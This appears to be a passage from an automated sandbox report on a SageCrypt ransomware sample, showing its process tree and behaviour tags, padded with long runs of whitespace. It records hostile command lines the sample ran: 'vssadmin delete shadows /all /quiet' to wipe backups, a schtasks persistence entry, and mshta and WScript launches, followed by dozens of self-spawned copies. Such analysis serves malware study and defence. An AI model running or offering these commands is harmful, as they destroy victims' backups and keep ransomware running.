                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Sets desktop wallpaper using registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies Control Panel
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:664
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\schtasks.exe" /CREATE /TN "N0mFUQoa" /TR "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" /SC ONLOGON /RL HIGHEST /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5680
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3192
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5156
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6340
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\!HELP_SOS.hta"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6168
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f1.vbs"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3456
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6020
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7808
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3460
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7832
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7868
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7908
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6760
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7848
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7968
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7960
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7900
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2448
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
